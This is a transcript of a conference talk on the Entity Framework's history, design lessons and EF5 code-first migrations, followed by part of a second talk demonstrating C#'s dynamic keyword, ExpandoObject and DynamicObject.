People started doing blog posts comparing the performance of the entity framework versus link to SQL which another object relational mapper that Microsoft eventually shipped which kind of came out of object spaces but that's a whole different story. Link to entities, it's that graph that represents how the entity framework would perform when you did a link query against SQL server tremendously slower than using a data reader in every way. It used more memory, took more time, required more CPU percentage. And so the problem here is that the entity framework delivered us a product and the only thing it could do was talk to a SQL server database. It was designed to do all these other things but what we wanted to use it for and the only thing it could do at that time was talk to SQL server and it didn't do it very well. I like to compare that to Dropbox. There's a question and answer site out there called Quora where someone went to the site and said, why is Dropbox so popular? They don't have all the features that all these other sync technologies had. And the answer that was posted to that was, well, think about the sync problem. You want to folder, you want to put stuff in it and just have it sync. When the architecture astronaut looks at file synchronization, they say, well, we'll need that to generate RSS feeds and we'll need to synchronize things in the cloud and write reports against it. Well, no, that's not what 98% of people want. They want to folder, put stuff in it and it syncs. Very simple. So there was this large backlash against the first release of the entity framework including an entity framework vote of no confidence which was a web page that someone stuck up and then within hours it had a couple hundred signatures and basically the text in there said, here's the reasons why we don't believe in the entity framework. Here's the reasons you should avoid it. And they were all very legitimate. And the problem really was that they didn't solve any one particular problem very well. It came out with such a generalized architecture in preparation for solving all sorts of different problems that the one thing that it could do which was access SQL server, it didn't do it very well. It had technical limitations. So faced with all this negativity about the entity framework, Microsoft launched a nice small marketing campaign just kind of like they did with for Windows Vista when they had a Jerry Seinfeld commercial. Don't ever know if that made it over here in Europe. It only showed for a couple nights in the United States and didn't get a very good response so they canceled it almost immediately. It was just Jerry Seinfeld and Bill Gates walking around doing weird things like trying on shoes and talking about cake. Probably find it on YouTube. The entity framework team did something similar which is to blog and basically start a marketing campaign and messaging about the entity framework. And if you could summarize what they were trying to say, what they were trying to say is that don't call the entity framework an object relational mapper. Don't compare it with those other technologies like link to SQL and Hibernate. That's really not fair. It's an apple to oranges comparison. It's not an object relational mapper. It's a conceptual level development platform, whatever that means. So that was one post from a PM at Microsoft. 
There was another one from Danny Simmons at Microsoft who said, you know, the big difference between EF and Hibernate is that we have this long-term vision for the data platform we're building around it. It didn't help any of those. It didn't help those of us who were trying to use it from the first day that they had these long-term visions because we're trying to use it immediately. Really it generated a lot of confusion because then people were thinking, well, is it an object relational mapper? Does it talk to a database or not? Because they're talking about these conceptual data independent platforms. I'm not exactly sure what the entity framework does anymore. But if you look at it, it certainly walks like a duck. So it walks like an ORM and it talks like a duck. It talks like an ORM. What Microsoft was saying was, no, it's not really a duck even though it looks like a duck and walks like a duck. It's really a swan. It's just going to take a few years to get there. It's just all complete magic. And essentially what Microsoft was saying was, we're making a promise to you that this will get better. And there was a Scottish poet, I think his name was Robert Service, who said, a promise made is a debt unpaid. Microsoft's entity framework was going in debt saying, if you use our framework today, we promise we'll pay you back tomorrow. Or it might take a little longer than that. It might be next year, three years. But don't worry, we're Microsoft. It's not like we ever kill off any frameworks or platforms that we have. So lesson three, when I think about it, I think you should never ask your customer for a long-term loan. Always try to be delivering something to them, be honest with them, be upfront with them. Don't try to spin missing features with marketing talk and say that you'll eventually get there. So now there's a lesson we can learn. The first version, the entity framework, when people reverse engineered their database, they generated this entity data model. What the entity framework does is take that entity framework, entity data model, and it generates C-sharp code for you. The first thing you do is you open up that generated code to see what it looks like. And, you know, there was a lot of stuff in there. It had a base class called entity object that had all these serialization attributes, it had all these partial methods. And a lot of people looked at that and said, that's not what we want from this framework. We want simpler objects. We want to be able to take control of that code generation. Or we want to be able to use our own classes and plug it into a data model. Well, with the entity framework version four, which was really the second version of the entity framework, they just incremented the number to synchronize with the.NET framework version, ostensibly, but could have been marketing, too. They introduced some extensibility in that code generation mechanism. So now, when you have an EDMX file in your project, and it's up there in the designer, you can right-click it and say, add code generation item, and select from a template that allows you to generate code in different ways. And one of the templates that they delivered for EF4 was the Poco entity generator, where Poco stands for plain old C-sharp object, unless you were a VV programmer and called it plain old CLR object. But either way, the code that was generated from that was much simpler. 
You didn't have a base class, you didn't have all those crazy serialization attributes; it tried to generate really straightforward C# code. I know a lot of people started using it, but I always found it strange, because years ago I read a book called POJOs in Action. POCO derives from POJO, which is plain old Java object. POJO was a term coined around the year 2000 by Martin Fowler to describe the simple Java objects being written by Java developers, because at the time Java developers were facing the Enterprise JavaBeans specification, which required them to write a lot of boilerplate code and divide their code artificially into these transaction scripts just to satisfy the framework. They didn't like it, so they said, what we'd really like to do is implement business logic in a simple Java class, do unit testing or domain modeling or whatever we want, have something simple, and then plug it into these other frameworks. Instead of having the frameworks drive our code, we want to drive our code and plug it into the framework. That, to me, is the real essence behind POJO and POCO. To me, a POCO is never something that you would code generate. A POCO is something that you care about, that you want to create, that you want to design using test-driven development. That was another complaint of the ADO.NET Entity Framework vote of no confidence: they said that what you're doing is promoting an anemic domain model. You generate all these POCOs from the database and they're just property, property, property, property. There's no good way to add behavior. Yes, you can create a partial class and add methods in there, but then you have your methods over here and your data over there, and it's really hard if you want to start from scratch and write your own C# class and have it work with this. Because again, POCOs to me are all about writing the C# classes yourself, building your model by hand, caring for it, feeding it, hoping it grows up to be a big maintainable domain model. But I've witnessed firsthand more than one company that has used that POCO template and will say to me, hey, we're following best practices. We're using POCOs with the Entity Framework. That gives us a great business layer, something we can just serialize out through WCF and bind as a model in MVC. But they had no real understanding of what a POCO actually was, I don't think. This picture, if you search for cargo cult on Wikipedia, is a plane made of bamboo on an island of a cargo cult. I won't go into what a cargo cult is, but that's something you can look up on Wikipedia. So I think the lesson here, the fourth one we can learn, is that with the Entity Framework, even in version four when they were trying to deliver these new features, they still didn't understand the problem that some people had with it, which was that it was generating code and promoting data-centric models. All right, just one more lesson to go. That EDMX file, when you open it up in the designer, could get kind of complicated. And I think when you're designing a framework, or anything a developer or a user is going to interact with, you really have to think about the experience they're going to have. If I'm building a simple application with 10 or 12 entities, then, yeah, that designer works pretty well.
But when I have a database with 150 tables in it, or I have a model that I want 150 entities in it, the designer kind of gets complicated. Starts to look a bit like a circuit diagram. So this is what it looks like when you have about 150 entities. This is what it looked like when you had too many entities. And that visual designer just didn't meet a lot of people's needs. And behind that designer, what an entity data model really was, was a big XML file. And it was quite common that you would interact with the designer or update things from the database, and you'd get these error messages about stuff that's inside the XML that were just undecipherable. You look at an error message like this, and there's probably 25 people on the face of the planet that know exactly what that means, and they all worked on the team. I translated it into Norwegian just to see if it would make any more sense. But you know what it means to me when I see that? It means just revert and go back to the last good check-in, and then try those changes again and see if they were. The irony to me is that if I want to build a model like this, just two classes, employee and department, if I have to use that visual designer and create a bunch of XML, those two class definitions would require that much XML in the EDMX file to generate that. And if you look at what's inside of an EDMX file, what you'll find is that it's really just metadata. It's describing type names, data types, relationships. But so are my C-sharp class definitions. There's a name, there's a column name or a property name, there's a data type, there's a relationship. It's all the same information. Why did we have to start with XML to get the simpler C-sharp code? Why don't we start with the C-sharp code and not worry about the XML? Well, XML is just one of those favorite things that Microsoft likes to use. The XAML team, the team that built WPF and technologies like Silverlight said, hey, we're choosing XML because it's toolable. And I've always found it, well, at first glance, if you look at it and you say, okay, Microsoft is a tool company, they build tools. So it would be a natural choice for them to pick an implementation language that's very toolable. But if you go back to the keynote on the first day and you start to question and think about it, what problem are they really solving? Well, if a software vendor that has expertise in building tools has chosen an implementation language that's toolable, then they're solving their own problem. They're not solving the customer's problem. They're making it easier for themselves to build tools like the entity data model designer and blend, not making it easier for me. I mean, if I want to animate something using CSS3 in a web browser, that's all the code I have to write. If I want to animate something in Silverlight to animate a background color, hopefully I'll be using a tool to do that, generate all that XML. I think it's just not having empathy for the customer when they set out to design some of these things. Those are my five lessons. Let's see how they are doing these days. What I'm going to do is switch over to a virtual machine that is right here. We're going to take a look at a simple console mode application, Visual Studio 2012. Right now it has no references to anything entity related, but it does have a couple type definitions in here that I'd like to interact with. Here's an employee. Just the employee has an employee employment status. If I go to that, that's an enum. 
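The model classes on screen are roughly like this (my sketch; the property names are assumed, and the odd enum value is the one the demo data uses later):

    public enum EmploymentStatus
    {
        Active = 0,
        Terminated = 86   // the value used for a terminated employee in the demo
    }

    public class Employee
    {
        public int Id { get; set; }
        public string Name { get; set; }
        public EmploymentStatus Status { get; set; }
    }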
I have a department that has a collection of employees. What I'd like to be able to do is instantiate some employees or instantiate some departments and give them some employees and save this all in the database and use the entity framework and not get involved with designers and XML files and all sorts of things like that. One of the lessons they learned was to deliver software more frequently. What I'm going to do is use NuGet to install the entity framework version five, which is still a release candidate, but presumably will be released when.NET 4.5 is released. Install EF5. While that's installing, I'll tell you there's already been a release of the entity framework this year. They released 4.3 this year. They released 4.1 and 4.2 last year. They've already gotten a lot better at listening to feedback and delivering software more frequently so that people can tell them what they like and they don't like about this. I have just installed the entity framework. All that really should have done was added a reference right there and changed my add an app.config file that just sets up the entity framework to use a connection to localDB. If you haven't heard of localDB yet, localDB is just another type of SQL Express instance. It's a SQL server process that's running on my local machine just for me. I can add databases to it and I can still interact with it through server explorer and things like that. It's going to talk to localDB. Just having that reference in my file, now what I can do that I have this model is I can go out and create a class to start persisting it. I'm going to insert a class. Let's call it companyDB and just have it derived from a class called dbcontext. If you haven't worked with the entity framework, this is the simpler dbcontext API that wraps that old object context API that's behind the scenes and makes things a little bit easier to work with. The only thing I really need to do to get started here is to give this thing a property of type dbset which ultimately implements Iquariable. This is formerly what you would think of as an entity set, a dbset and let's just add department. I could add employees too but I'm just going to add department to this. That's how I want to get into the database and get to employees through my department. Now I have everything in place where I could create a database and the way I'm going to do that is to use some features that are new to the entity framework as a version 4.3 called code first migrations. I need to open up the package manager console and the first thing I'll do is enable migrations. I'll show you what this will do. This will add a file, a folder into my project called migrations and inside of that will be a dbmigrations configuration-derived class that first of all sets up automatic migrations. I'll explain what that means a little bit later. It gives me a seed method. This is basically what I'm preparing to do is have the entity framework manage my database schema for me. This is one approach to working with databases. It's a great way when you're first developing a project to just get up and running quickly with the database. When it's managing the schema, it can also seed the database for me. If I just completely drop the database and recreate it, it can put some additional initial data in there for me and things like lookup tables and so forth. I do want to seed the database. Just give it a department with some employees. I could say give me a new department. We'll give that department a name of engineering. 
I'm not sure I spelled that right, but that's okay. We'll say department.employees. Let's create some employees too. Give me a new employee. We'll just set the name. I think name of Scott. New employee name equals Sue. And one more employee. New employee name equals Rob. Let me do a build. Let me also do a context.save changes and do a build. And now what I can do. What did I do? Oh, yes. I need to tell the context to add, sorry, context.departments.add or update this department. And so since it's seeding, what it can do is actually go in and see if that department by that name actually exists. And if it does, it won't try to seed it again. Thanks for catching that one. So we'll build. And the next thing I'll do is create an initial migration script using the entity framework. So again, go to the package manager console and say add a migration script for me. Let's call it the initial migration for my initial model. So I'll make changes to it later. And that added a file to my project called initial that inherits from DB migration. And in here is essentially a somewhat fluent DSL for performing DDL statements. So create table statements, create index statements, things like that. So give me a table called departments. The second parameter to this is basically a delegate that will get passed in a column builder. So this lambda expression C is a type column builder. And you basically can use an anonymous type to describe the columns that you want. So I want an ID column that is not nullable. That's going to be identity property. I want a name that's a string. Maybe I want to set something like the max length. These are all optional parameters that you can, if you have a value to specify, you can just use a name parameter to say something like, I forget what max length is, just max length. Max length, 255. Right? Whoever designed that API at least had some empathy for who was going to use it. You know, they were thinking about how can we make this easy for developers to express? How can we make the code a little bit readable? Create a table called employees. Oh, the other thing I could do here is, yeah, give it a primary key of an ID, but maybe I want an index too. Maybe I want an index on the name property. And to make it make sure that the department names are unique. You can do that too in here. So you can certainly modify these migration files after they're generated by the entity framework that package manager console, essentially when you run that program, it looks at your existing model definition. So it's looking at all that rich metadata that the C sharp compiler can produce from a.cs file, all the type names and property names and data types. It looks at your model definition and figures out what sort of schema I could build to save that model. So we have the department's table, the employees table. It's set up primary keys. It's set up foreign keys. It's set up nice little indexes that will probably need. Like if I have employees related to a department, chances are I'll look up employees by their department ID. All right. I can come into the package manager console again and I could tell it to now update a database which is look at my current database that's in place and if it needs any new migrations, just go ahead and apply them. I don't have a database yet. You might be wondering what database this goes to. There's a lot of conventions in the entity framework now. 
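For reference, the context class and the generated Initial migration from this part of the demo look roughly like this (a sketch, not the literal generated code; the Employees table is produced the same way and the Down method is omitted):

    using System.Data.Entity;
    using System.Data.Entity.Migrations;

    public class CompanyDb : DbContext
    {
        public DbSet<Department> Departments { get; set; }
    }

    // Roughly what Add-Migration Initial generates, after the tweaks described above
    public partial class Initial : DbMigration
    {
        public override void Up()
        {
            CreateTable(
                "dbo.Departments",
                c => new
                    {
                        Id = c.Int(nullable: false, identity: true),
                        Name = c.String(maxLength: 255)
                    })
                .PrimaryKey(t => t.Id)
                .Index(t => t.Name, unique: true);
        }
    }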
So if you don't explicitly give it names or explicitly give it connection strings or explicitly map things, it's just going to figure things out based on names. It's just going to connect to local DB and create a database that has the same name as my DB context derived class which was company DB, including the namespace. And that's what will happen during update database. But before I do that, I'll tell it don't actually update the database, generate a script for me so I can update the database or so I can hand it off to a DBA or I can check it in the source control. So this is the SQL. It's going to execute when I actually do update the database. So create tables, create unique indexes and then it uses a migration history table inside of the database to track all the migrations that it's going to apply against this database in the future. So you can see that has a migration ID, has a... I can't remember if that's a hash of the model now or if it's like a full model definition that's in there. I tend to think it's now it's a full model definition and some internal version numbers that it uses. So if I want that to work, I can just say update database without the script part and you can see it applied the migration, ran the seed method and that means if I open up the database, SQL server object explorer and refresh. I now have evolution.companyDB so just determine the database name based on the name of my DB context class. It has departments, it has employees. Let's look at the employees. It seemed to get my three employees inside of there. Oh, I forgot to set a status on them. Let's give one a different status. So my employment status terminated was 86 for whatever reason. Let's give this one a terminated. We'll terminate Rob for blasting music. And I should be able to use this now. So DB equals new company DB, query equals DB.departments. Oh, yeah. Let's include. When we get a department, I want to include employees and the reason this is fighting me right now is because the strongly typed include method is in a different namespace. It's an extension method. So if I do a using on system.data.entity, then this should be a little bit happier. So include or maybe not include employees and let's just put that in a list. Alright, so now we should be able to foreach department in the query and write out the department name. And we should be able to foreach employee in department.employees. And we could write out something like let's tab over and write out the employee name, comma, employee status. So employee.name, employee.status. Let's try it. Yeah. I think I just closed it. Try that again. So no XML was required in the making of that. No visual designers, no crazy messages. It's kind of nice. What's interesting is behind the scenes, all of that machinery is still there. There still is an entity data model. It's just created on the fly now based on the CLR type definitions. And so they did a much nicer job of looking at the problem I'm trying to solve, which was take these models and stick them in a database somewhere and allow me to retrieve it. They're doing a much better job at looking at that problem and allowing me to solve that problem well without all this other crazy stuff going on with entity data models and so forth. Questions about that? Pretty straightforward. Yes? Yes? Yeah. I think so the question was, can I generate a script based on a database, like compare my database to something that's in production? Oh, update the database that's in production. Yes. 
When you, there are ways, let me bring up the package manager console again, which kind of disappeared. When you do update database, there is a way to specify basically things like the connection string it should use. So you could say update the database, but don't use this conventional thing of looking at my local DB. Use a different connection string and go to it. There's also the possibility of creating a script based on a source database and a target database. So if you have your development database completely updated and it's ready to go, you could say update database, source migration and point it to your database, target migration, someone else's database, and it'll figure out the delta between the two and either apply those migrations for you or if you include dash script, it will generate a script for you to do that. Yes? Just schema. So the question was, does it include data as well? It's just schema right now. Does it touch the data now? If you, I mean, there's all sorts of situations you can run into where you have to massage the migrations a little bit. Was someone yelling from up there? Yeah? MySQL? Oh, how? Does it support like MySQL? Yeah, I don't know about MySQL. I know one team that's using Entity Framework with an Oracle provider and they seem to be having some success with it. But if you send me an email, I can check on that one. Let's look at another scenario. Let's say that I, let's look at the data real quick. So kind of going back to your question, if we look at, look at departments. Actually, let me look at employees instead. Let's create an employee that has a status and a salary but no name for whatever reason. It kind of gives back to what we saw in the workshop yesterday. So that's existing data in there. It was completely legal at this point to have an employee with no name. And now someone has discovered that as a problem and they do one of two things. They either go in and they change that configuration script to require a name or they change something in the model. Like I can go into an employee and say, oh, this name, actually I really want it to be required. So metadata on the model itself. And that is a change in the model that if I go into the package manager console and do add migration name required, it will create a new migration for me. Where it's going to be. And if I try to run this, I'll run into a little bit of problem because it's trying to say name is not nullable but we have an employee in there who has, whoops, did one of you code, has a null name. You guys saw that. So let me open up the package manager console, say update database that should come back with an error, cannot insert the value null into column name. So it doesn't look at data or know anything about data. That's a condition where you have to go in here manually and do something like execute some custom SQL. So update employees set name equals empty string where name is null. And that should fix that data problem for us. If I update the database now, fingers crossed. And the interesting thing is I think it's trying to seed the database again and running into the problem there. And that might be because of my initial seed method. I didn't give a department an ID and it's probably querying by primary key. That's okay. If I run this right now, we still have that original data in there and I should have a column that is a not nullable name anymore. Yeah, not null. So to apply that migration. So some other things. What happens if I don't like any of this? 
If I don't like these conventional mapping, so one of the things you could do with the edmx file and the entity designer was map objects to different tables. Give them different names, give columns different names. Or if you wanted to do this sort of approach of using simple objects that you write in a DB context class that use it against a legacy database where the names are kind of weird and you don't want to name this something like TBL departments. Right? I don't want to do that. There's also a fluent, somewhat fluent mapping API that you can use in a method called own model creating. So inside of here I could do something like Dear Model Builder. There's an entity called department and what I want to do is put that into a table called TBL departments. So explicitly giving it a name. And if I want to get a little bit fancier I could say there's a department entity that I want to map and then map basically takes a lambda expression where you get a parameter of type, entity mapping configuration, so I'll call this C for configuration, make it a multi-line lambda expression. So I can say things like C.2 table TBL departments, but also by the way C dot, oh let's see, properties given this table. Do something with the name or do something with the ID, add a whole bunch of code in here to map individual properties and set different attributes on them. And then let me back that up to do just two table to show you that if I add another migration now, change table name, what are they doing over there? That should give me a migration that just renames table, rename TBL departments to TBL department. And I could apply that against the database. So that's EF 5.0, trying to think if there was something else that I wanted to point out to you. Yeah, so, ha, stored procedures, not so good with the code first right now. I mean you can always do once you have a DB instance, you can do DB dot departments dot SQL query and do an exec on a stored procedure and pass in parameters and that would work. But currently there's no nice way to map that into a method that you just call. You'd have to do some manual work to do that. The old EDMX designer used to do that for you automatically. But when you do DB dot departments dot SQL query, it expects you to give it a SQL query that will return department entities. Yes? Oh, yes, complex types work now. The way it identifies a complex type is that if you have something embedded, let's say inside of employee that doesn't have a way to uniquely identify itself. So we'll give employees an address and an address has city, state, and zip. And then we go into the employee and say, let me dock this. You know, maybe there's a home address and a work address or shipping address and something like that. Let me do a build. Oops. Comment that out. Do a build and then come into the package manager console and add a migration. Add employee address. Then this used to the required attribute. I think I know what you mean. Oh, yeah, that's not good. Hopefully that was a problem. All right, let's try that again. Add migration, add employee address. Yeah, so now it's in a little bit of a confused state. Sorry. I made something public. The let's see what this looks like now. All right. Just had to do an update. So that's a complex type now. Let's see if I can split this on the screen. Employee has an address, a home address. That's a complex type because now what it's going to do is embed that in the employee table. 
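A rough sketch of the two things just described, the fluent mapping in OnModelCreating and the complex type (names as used in the demo, details assumed):

    using System.Data.Entity;

    public class CompanyDb : DbContext
    {
        public DbSet<Department> Departments { get; set; }

        protected override void OnModelCreating(DbModelBuilder modelBuilder)
        {
            // explicit table name instead of the default Departments convention
            modelBuilder.Entity<Department>().ToTable("tbl_departments");
        }
    }

    // No key property, so by convention EF treats this as a complex type
    public class Address
    {
        public string City { get; set; }
        public string State { get; set; }
        public string Zip { get; set; }
    }

    // On Employee: public Address HomeAddress { get; set; }  // embedded, not a separate table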
So the employee table will have a home address underscore city, underscore state, underscore zip in it. So that's supported. Does that answer the question? Yeah. Yeah. So the observation I think is that the EDMX, you can still do some fancier things with. Yeah, some scenarios. Oh, so the question was why did I do that first script instead of just using the model builder? This initial script? Because this one, so the model builder is just a way, why did I do that instead of just using the model builder? And the model builder to me is just a way to specify metadata about the mapping. So here's how you take my model classes and map them to the database. And it's the migration scripts that are used to actually take that model information that the model builder produces, take that information and now generate a schema to save it with. This is the thing that actually generates the DDL and it works with update database and stuff like that. That to me is the difference. Well I think I'm just about out of time. I know you guys probably want to get to lunch a little bit early. I'm going to hang around for any questions that you have. Hopefully I demonstrated some things that you'll find useful. So thank you for coming.
|
A look at the past, present, and future of the Entity Framework brings to light some interesting contrasts in API design and customer empathy. In this session we'll cover everything from product marketing, to the true spirit of POCOs, and even see some of the new features in the latest version of the Entity Framework.
|
10.5446/50989 (DOI)
|
How was the party yesterday? Woo! Wake up people, wake up, the party's over. Are you ready for some C# super magic? Yeah. I need a yeah. I need to wake up too. Yeah! Oh cool, that's good. Okay, welcome to the C#, or what C# can do, talk. I hope that by the end of this talk you'll say, oh cool, I'm a C# developer and I like it. That's the target. My name is Shay Friedman. I'm a co-founder of a company named CodeValue, a consultancy and training firm. I'm a Microsoft MVP and the author of IronRuby Unleashed, which is the best book ever created. I have big, big competition from Harry Potter, they took all my readers, but we'll be fine. If you want to contact me, these are the ways: email, Twitter account, blog, everything. So now you know me. Let me see, how many of you are C# developers? Of course. And VB? Yeah, no one, by the way. I've never met someone who actually writes VB, but they say they exist. Okay, I'll just tell you what we're going to see today, because there are three parts to this session. The first one is the dynamic keyword and what we can actually do with it, because a lot of people just know that it exists but have never actually used it. So we'll see what we can actually do with it. Then we'll move forward and see some cool stuff we can do with the DLR and the Iron languages, like IronRuby. And we'll end up with some Roslyn, which we'll talk about when we get there. Okay, so how many of you have heard about dynamic? Almost all of you, right? And how many of you have used it in production? Wow, at least like seven people. That's the most I've gotten in this talk, so good for you Norwegians. So this is the thing. The dynamic keyword has been around since .NET 4 was released, so about two years, something like that. And not a lot of people have actually used it, because it seems like everything changes, right? Once you go dynamic, your whole world just collapses. Like, ooh, the compiler is not here, what am I going to do? So it's kind of on the extreme side of .NET, and I do hope to make it more mainstream. The thing about dynamic is really that the compiler won't save you here, because everything is done during runtime. Once you assign a variable and it's a dynamic variable, all the method resolution and access to fields and properties is done during runtime. Now, that's just the definition, but you can do so much stuff with it. Cool stuff. Magic, some would say. And why not? It's right there for you to use. So let's dive into the demo. Close that and open Visual Studio. The first demo is about generics. How many of you use generics? Right? I have a problem with generics in C#, especially with the term generics itself, because think about it. Generics in C#, yes, thank you. When you want to create a new instance of the generic type, you need to have a constraint, right? And maybe you need a constraint about an interface or a class. Generics and constraints are kind of opposites, right? How do you call it a generic method if it has constraints? So I want to have a real generic method: once I call something on that generic object, I can pass any object whatsoever that has the method or field I'm accessing. I don't want a base class, I don't want an interface, I don't want constraints. I just want to write a generic method that works everywhere, something like the sketch below.
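A minimal sketch of where this first demo ends up (my reconstruction, not the exact demo code):

    public static class Demo
    {
        // With a generic T alone this wouldn't compile: the + operator isn't defined for T.
        // Using dynamic defers the lookup of + to runtime, so any type with a + operator works.
        public static dynamic Add(dynamic a, dynamic b)
        {
            return a + b;
        }
    }

    // e.g. Demo.Add(1, 2) -> 3, Demo.Add(6.78, 9.21) -> 15.99,
    //      Demo.Add("Hello ", "World") -> "Hello World"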
And this is why I also call dynamic generics on steroids, because you can do generics in .NET in a really generic way. So let's see that. Let's go here and write public T Add<T>(T a, T b): we return a T and take two T parameters, a and b. For now I'll leave the body in a comment so we can see whether it compiles or not. So can I do that with generics today? Would it be okay? How many of you think I can remove the comment and it will compile fine? Okay, how many of you think it's not going to be good? Yeah, well, you Norwegians know your stuff, good for you. I can't say Norwegians, right? Probably most of you are not from here. Okay, so good for you. So yes, generics doesn't allow me to do that. You see the red line there, it says I cannot apply the operator. But I want it to be a generic thing. I want to pass whatever I want here and add these two objects. So what do I do to solve that? Just change it to dynamic and I'm done. Okay, it compiles and it actually works, not just compiles. So I can do Console.WriteLine, Add with an int and an int, pass it 1 and 2, and I get an int back. I can add two doubles, 6.78 and 9.21 or whatever, and get a double back. And I can do even crazier stuff like "hello" and "world", because I can add two strings, so it works. I can even do 1 and "hello". How many of you think that will work? You're right, .NET allows you to do that. Let's run it so you believe me. So you see, it just adds all the stuff. Oh, you can see that? Now you can see that, no? Okay, that's good. So you see, one method fits all, which is exactly what generics is about. And I can go even further, because now I can add any two objects that support the plus operator, and even if I add a new type, it would fit this as well. So I have here a class called FunClass, because it's very fun. It has Data, just a string property, and it supports a plus operator between two FunClass instances, so you have double the fun and double the data, okay? So this is just the FunClass, and then I can use it with my Add method because it's really generic. I didn't have to implement anything, I just needed to have the plus operator there. So I can call Add with a new FunClass, "hey hey", I don't know, something like that, and another new FunClass. And I can run that and it still works. Yeah, you see that. So you see, this is what I call generics, because it's really generic. And you can see that I didn't need to use dynamic all over the place. I just have it where I need it, inside this method, because it makes sense there. So why not, right? Moving forward to another demo. Now, how many of you know ExpandoObject? Okay, how many of you have used it? Cool, right? How many of you use ASP.NET MVC 3 or 4? Okay, so you guys, if you have ever used ViewBag, ViewBag is an ExpandoObject, okay? So maybe you don't even know that you're using ExpandoObject. Because of MVC 3 and 4, ExpandoObject is probably the most popular dynamic object out there. ExpandoObject is also called, I think, a state bag: you just put stuff into properties and use them like they were real properties, but you never have to actually declare and define those properties, okay? And you see, when you new up an ExpandoObject, you get back a dynamic object, right? And now I can do something like expando.Message = "yo yo".
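In code, that bit of the demo, including the Print "method" that comes next, is roughly this (a sketch):

    using System;
    using System.Dynamic;

    dynamic expando = new ExpandoObject();
    expando.Message = "yo yo";               // no Message property was ever declared
    Console.WriteLine(expando.Message);      // prints "yo yo"

    // behavior can be attached the same way, as a delegate that acts like a method
    expando.Print = (Action<string>)(msg => Console.WriteLine(msg + " dog"));
    expando.Print("yo");                     // prints "yo dog"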
And I've never created this Message property, but it looks like a property, it feels like a property, so who cares, right? It's a property for me, and I can just go ahead and print it, expando.Message, and it works; let's go here and just change this to demo 2, and you see, you get a yo there. Now you can even add methods. So, like, expando.Print, and let's make it an Action that takes a string msg and does Console.WriteLine of the message plus "dog". Yeah. And now I can use this Print method, call Print and pass it "yo", because this is what we do. Let's run that and we get "yo dog". It's cool, right? So it's kind of a way to construct classes at runtime. If it helps you do stuff, that's great. It's great for MVC, because you have this controller and a view that don't rely on each other, and this dynamic object keeps them decoupled. So it's a cool thing, and it makes sense in these kinds of scenarios, where you have two different components that don't know about each other and you might change the objects that go between them. This is a good way to do that. Okay, so this is ExpandoObject. Let's continue to another demo. By the way, ExpandoObject is a dynamic object, and .NET also gives us a base class named DynamicObject with the same kind of dynamic capabilities, which we'll see how to take advantage of in a moment. Underneath, ExpandoObject is just a dictionary: a dictionary of names and the objects you pass in. That's it. Okay, so if we can create classes that build on those dynamic capabilities, we can do this kind of thing ourselves, right? But before we do it ourselves, I want to show you a framework that someone else did. It's an open source project called ElasticObject, and it's a way to handle XML files. Okay, now how many of you have ever parsed an XML file? How many of you liked the experience? You right there, you must be an XML expert if you liked that. You'd have tons of money. Tons. Anyway, XML is not the nicest thing in the world, and this ElasticObject framework allows us to read and write XML in a more class-like way, which is great for me. You see, this is my simple XML. It has a people root element, and then it has a child element, person, which has a name, a Twitter handle, and a blog. Okay, that's it, very simple. Now I use XElement, which is just a LINQ to XML object, I parse the XML, and then I use this extension method called ToElastic and I get back a dynamic object. And this dynamic object, this people variable, represents the people element here, one-to-one. Then I can go over all the child nodes of people named person and get a dynamic object on each iteration. So this is how I get the child elements of the people element. And now in each iteration I have this person object, and it's dynamic, and what's cool about it is that I can use the attributes just like they were real properties. I didn't need to create a person class and then deserialize this stuff. It just works as it is, because it uses the dynamic keyword. So I use the element's attributes as properties. It looks like a class that I created, it feels like properties. So great, win-win, right?
Now, reading XML is nice, but writing XML is even nicer, right? Of course. So here again we can do something more class-like when we write XML. This is writing XML. We create a new ElasticObject and give it the name of the root element, and this returns a dynamic object. And now I can write Ben.name, which looks like a property, but this actually becomes an attribute in the output XML, right? Then I want to add a child element named songs, and in these songs I want to have a song and a song and a song, okay? The way you do that in this framework is you just go Ben.songs.song. This creates a new node named song, and then you give it the attributes and use them like properties, name and length. Then I have another song with a name and a length. And it looks like a class. I never created this class, because it's all dynamic. Now, the guy who created this framework, Anoop, a super smart guy, I don't know why he chose this way to output the XML from the dynamic object, but it's totally legit C# syntax: he just overloaded the greater-than operator, and this is how you do it, just syntactic sugar for calling a method. This, as you can see, returns an XElement, which is a LINQ to XML element object, and then you can go ahead and do whatever you want with that. So here I just print it. And let's see how it looks. So you see, these are the two lines that I read, just outputting them. And this is what happens when you create the XML using the ElasticObject framework, which is just Ben and the name and songs, and then we have a song and a song and an attribute, and it just goes on and on. And now if tomorrow someone comes to me and says, this song has to have something else, like a rating, and I want it just here, I can just go ahead and add it and run it again, and now it has name, length, and rating. Very simple. We don't need to go and change a class and then re-serialize and all this stuff, it's very simple and straightforward. There are more frameworks that have been created using dynamic, a lot of mini ORMs, like Massive and Simple.Data. If you want to just connect to a database and you don't want to use the Entity Framework or NHibernate, which are huge frameworks, check them out. One of them is called Massive, Rob Conery did that, actually, and the other is called Simple.Data. They're both very similar, so just go and look for them. Okay, so this is it. Now, another thing. Now we've seen how we use frameworks that take advantage of the dynamic keyword. Now we want to write them ourselves, right? So I've created this crazy, crazy super magic object. You see it's called LogMethodCalls, and it's a dynamic variable. And then I can do myObject.Yo, of course. And I can even go ahead and type here whatever I want, and you can stop me. Yeah, I can go all day. Let's save that and see what happens. So you see, crazy, crazy magic goes on. It just prints "trying to invoke Yo", then "trying to invoke ICanTypeWhateverIWant", and so on. And it's really cool, and it gives you the idea that you can actually intercept here. Once a method is called, you can do whatever you want with that, right? So let's see how we do that. This is the class. This is it, right? The name is LogMethodCalls, and it extends the DynamicObject class.
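A minimal sketch of a class like that, assuming the same approach as the demo (derive from DynamicObject and override TryInvokeMember):

    using System;
    using System.Dynamic;

    public class LogMethodCalls : DynamicObject
    {
        // Invoked for any method call made on a dynamic instance of this class.
        public override bool TryInvokeMember(
            InvokeMemberBinder binder, object[] args, out object result)
        {
            Console.WriteLine("Trying to invoke " + binder.Name);
            result = null;    // nothing useful to return
            return true;      // false would make the call site throw "method not found"
        }
    }

    // e.g. dynamic myObject = new LogMethodCalls(); myObject.Yo(); myObject.Whatever(1, 2);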
